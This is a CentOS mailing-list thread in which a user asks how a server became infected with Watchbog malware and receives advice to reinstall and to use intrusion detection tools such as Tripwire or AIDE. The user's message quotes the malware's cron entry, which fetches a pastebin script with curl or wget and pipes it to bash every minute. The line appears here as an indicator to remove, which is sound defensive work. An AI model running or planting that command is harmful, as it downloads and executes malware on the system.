On 17 December 2018 9:58:03 p.m. "Pete Biggs" <pete at biggs.org.uk> wrote: >> Is there a way to find out how the CentOS 7.5 Linux box got infected with >> malware? >> Currently i am referring to >> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html >> to carry out the below steps and is done manually. >> >> 1)rm -fr /tmp/*timesyncc.service* >> 2)crontab -e -u apigee >> delete the cron entry >> */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- >> https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1 >> 3)ps aux | grep watchbog >> kill -9 pidof watchbog >> >> Any suggestions or recommendations to find out how CentOS 7.5 Linux box got >> infected with Watchbog Malware. > > Well, if the infected crontab is owned by user 'apigee' then it would > suggest that whatever runs as that user is the source of the infection. > The malware appears to try to elevate its privs, and if it's successful > it modifies various system files. What you are seeing in the 'apigee' > crontab is just the tip of the iceberg. > > It is unlikely that what is in that blog will successfully get rid of > all the malware - it will probably stop it running, but your system > will still have the malware on it and it may have left other backdoors > into your system. > > The *ONLY* way of being sure your system is clean is to wipe and > reinstall. (And make sure that if you restore from backup, that the > backup is clean.) > >> Is there any open source software which can >> be installed on CentOS 7.5 Linux box to detect and prevent Malware? >> > Yes, lots, although most centre around detecting the intrusion rather > than preventing it - the classic way of detecting intrusions in the > past has been Tripwire, but it's a long time since I used it and there > are no doubt better things around. Search for "linux intrusion > detection tools". > > For prevention, by far the best way is to keep your system and > application software up to date. The intrusions work by elevating > privilege to root, and that elevation requires either a knowledge of > passwords/keys or the ability to leverage vulnerabilities. The first is > mitigated by strong passwords and proper security housekeeping; the > second by regularly updating your system especially with security > updates. > > P. > > > _______________________________________________ > CentOS mailing list > CentOS at centos.org > https://lists.centos.org/mailman/listinfo/centos AIDE is the closest equiv to tripwire on centos. regards peter Sent with AquaMail for Android https://www.mobisystems.com/aqua-mail